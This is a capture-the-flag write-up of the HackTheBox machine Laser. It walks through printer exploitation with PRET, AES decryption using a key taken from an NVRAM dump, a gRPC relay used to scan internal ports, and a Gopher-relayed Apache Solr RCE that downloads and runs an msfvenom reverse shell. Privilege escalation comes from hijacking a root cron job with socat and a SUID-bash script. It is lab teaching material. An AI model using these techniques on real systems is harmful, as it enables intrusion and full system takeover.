Introduction
We covered a difficult scenario of printer exploitation. We first interacted with the printer HP JetDirect running on port 9100 through the printer exploitation framework pret.py. We discovered an encrypted print job file with AES-CBC for which we found the decryption key using nvram dump in pret.py. The decrypted version was a PDF file documenting a service running on port 9000 named Feed Engine. To interact with the service, we used grpc tools and created a client script that sends requests through HTTP to the feed engine server. We used the client we created to probe for other internally opened ports and we discovered an Apache solr installation for we which we found an exploit and had the first shell. Privilege escalation was achieved by exploiting a periodically running service that exposes the SSH password and copies files from the machine into a docker container. This was part of HackTheBox Laser
Initial Enumeration & Printer Interaction
I started with an nmap
scan that revealed open ports, including 22 (SSH), 9000, and most importantly, 9100 (JetDirect – a printer port). Recognizing this, I used the pret
framework to interact with the printer. I connected to it using the PJL (Printer Job Language) by running pret <IP_ADDRESS> <PORT> pjl
. Inside pret
, I used ls
to list files and found a jobs
directory and a file named queued
. I downloaded this queued
file to my local machine using get queued
, and file queued
identified it as “ASCII text.”
- Commands:
nmap <target_ip>
pret <IP_ADDRESS> <PORT> pjl
ls
(within pret)get queued
(within pret)file <filename>
Decoding and Decrypting the queued
File
The queued
file looked like base64 encoded data, but a simple base64 -d
didn’t work because it was an encrypted base64 string. I manually removed Python byte indicators (like b'
and the trailing single quote) from a copy of the file. Then, I tried decoding it with cat queued_modified_base64 | base64 -d > queued_decoded
, but file queued_decoded
still returned “data,” suggesting encryption. Viewing the hex header with xxd queued_decoded
also didn’t help.
To figure out the encryption, I reconnected to the printer with pret
and used the env
command to check environment variables. I found LPARM: ENCRYPTION_MODE=AES_CBC
, confirming AES encryption. AES keys are often in memory, so I used the nvram dump
command in pret
to retrieve the encryption key.
With the key and the encrypted file, I wrote a Python script to perform AES CBC decryption. The script read the queued
file, base64 decoded it, defined the Initialization Vector (IV) from the first 16 bytes, and then used the retrieved key to decrypt the ciphertext, writing the decrypted content to a new file named q_decrypted.pdf
.
- Commands:
cat <filename> | base64 -d > <outputfile>
xxd <filename>
env
(within pret)nvram dump
(within pret)
Interacting with the Feed Engine Service (Port 9000)
The decrypted PDF contained guidelines for a service called “Feed Engine” running on port 9000. The documentation specified using “protocol buffers and the gRPC framework” with an RPC method FeedNote
that takes Content
and returns Data
. A successful transmission would show “pushing feeds.”
To use gRPC, I first installed the necessary tools: sudo python3 -m pip install grpcio-tools --break-system-packages
. I then created a .proto
file (e.g., laser.proto
) to define the service and message types, following gRPC documentation. I used the gRPC tools to generate Python stub files from the .proto
file: python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. laser.proto
.
Finally, I wrote a Python client script, importing the generated stub files and grpc
. The client script created a gRPC channel to the printer’s feed engine at http://printer.laser.internal:9000
and then created a stub using the generated PrintServiceStub
. I initially tested by pointing the client to my own machine with netcat
to observe the request, and then successfully connected to the printer’s port 9000.
- Commands:
sudo python3 -m pip install grpcio-tools --break-system-packages
python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. laser.proto
nc -lvnp <port>
Port Scanning via gRPC and Discovering Apache Solr
I modified the gRPC client script to act as a port scanner. It looped through a list of ports, attempting to send a request to localhost:<port_number>
via the feed engine on port 9000. If the response contained “pushing feeds,” it indicated an open port on the target machine (from the printer’s perspective). This scan revealed that port 8983 was open and returned “pushing feeds.” Research confirmed that port 8983 is associated with Apache Solr.
Exploiting Apache Solr for Remote Code Execution
I identified the Apache Solr version as 1.4, which has a known RCE (Remote Code Execution) exploit. The standard exploit involves listing cores via /solr/admin/cores
and then modifying a core’s configuration. The PDF documentation mentioned a “staging” core for the feed engine, which was my target.
Due to the limitations of interacting through the gRPC feed engine, I couldn’t use the exploit directly. I needed to craft a request that the feed engine could relay. I decided to use the Gopher protocol to send the malicious payload to Apache Solr via the feed engine.
I created a Python script that constructed a Gopher URL targeting localhost:8983/solr/staging/config
. The payload aimed to modify the Solr config to execute commands. I created a reverse shell payload using msfvenom
(e.g., shell.elf
). The script would instruct Solr to download this shell.elf
, make it executable, and run it.
I ran this exploit script using python2
(due to python3
URL library issues). I set up a netcat
listener (nc -lvnp 4545
) and successfully received a shell as the “solar” user, then grabbed the user flag.
- Commands:
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f elf -o shell.elf
nc -lvnp <port>
Privilege Escalation
To stabilize the shell, I generated an SSH key pair on my attacker machine using ssh-keygen
. I then copied my public key into /var/solar/.ssh/authorized_keys
on the target machine, set the correct permissions with chmod 600
, and ownership with chown solar:solar
. I then logged in via SSH: ssh -i <private_key_file> solar@<target_ip>
.
- Commands:
ssh-keygen
echo "<public_key>" > /var/solar/.ssh/authorized_keys
chmod 600 /var/solar/.ssh/authorized_keys
chown solar:solar /var/solar/.ssh/authorized_keys
ssh -i <private_key_file> solar@<target_ip>
Next, I uploaded pspy64
(a process monitoring tool) to the /tmp
directory on the target. Running ./pspy64
revealed a cron job frequently executing sshpass -p <password> scp ...
commands. These commands were transferring files from the “solar” machine to another internal IP (likely a Docker container) as root, using a hardcoded password. One of the transferred files was /tmp/clear.sh
.
- Commands:
wget http://<attacker_ip>:<port>/pspy64
chmod +x pspy64
./pspy64
I used the discovered password with sshpass
to SSH into the internal IP as root: sshpass -p '<password>' ssh root@<internal_docker_ip>
. This confirmed it was a Docker container.
- Command:
sshpass -p '<password>' ssh root@<internal_docker_ip>
My privilege escalation strategy involved:
- On the Docker container, I stopped the SSH service:
service ssh stop
. This was to prevent the legitimateclear.sh
from being overwritten by the cron job. - I uploaded
socat
(a relay tool) to the “solar” machine. I downloaded a static binary ofsocat
and usedwget
on the solar machine to fetch it from a Python HTTP server on my attacker machine. - On the “solar” machine, I ran
socat
to listen on the Docker container’s IP and port 22, forwarding to the solar machine’s own SSH service. This effectively made the solar machine impersonate the Docker SSH endpoint for the cron job. - On the “solar” machine, I created a malicious
/tmp/clear.sh
script. This script would copy/bin/bash
to/tmp/rootbash
and then set the SUID bit on it:chmod +s /tmp/rootbash
. - When the cron job ran, it was redirected by
socat
to my controlled SSH listener on the “solar” machine. Since the cron job runs as root on the “solar” machine and executesclear.sh
on the destination after copying, my malicious/tmp/clear.sh
was executed as root. - This created
/tmp/rootbash
with the SUID bit set. I then executed/tmp/rootbash -p
to get a root shell and finally retrieved the root flag.
- Commands:
service ssh stop
(on Docker)wget http://<attacker_ip>:<port>/socat
chmod +x socat
./socat TCP-LISTEN:22,fork,reuseaddr TCP:<solar_machine_lan_ip>:2222
(example, actual usage might vary based on specific redirection needs)echo '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash' > /tmp/clear.sh
chmod +x /tmp/clear.sh
/tmp/rootbash -p
This machine involved several layers, from printer interaction and custom protocol communication with gRPC to exploiting a known vulnerability and finally a creative cron job manipulation for privilege escalation.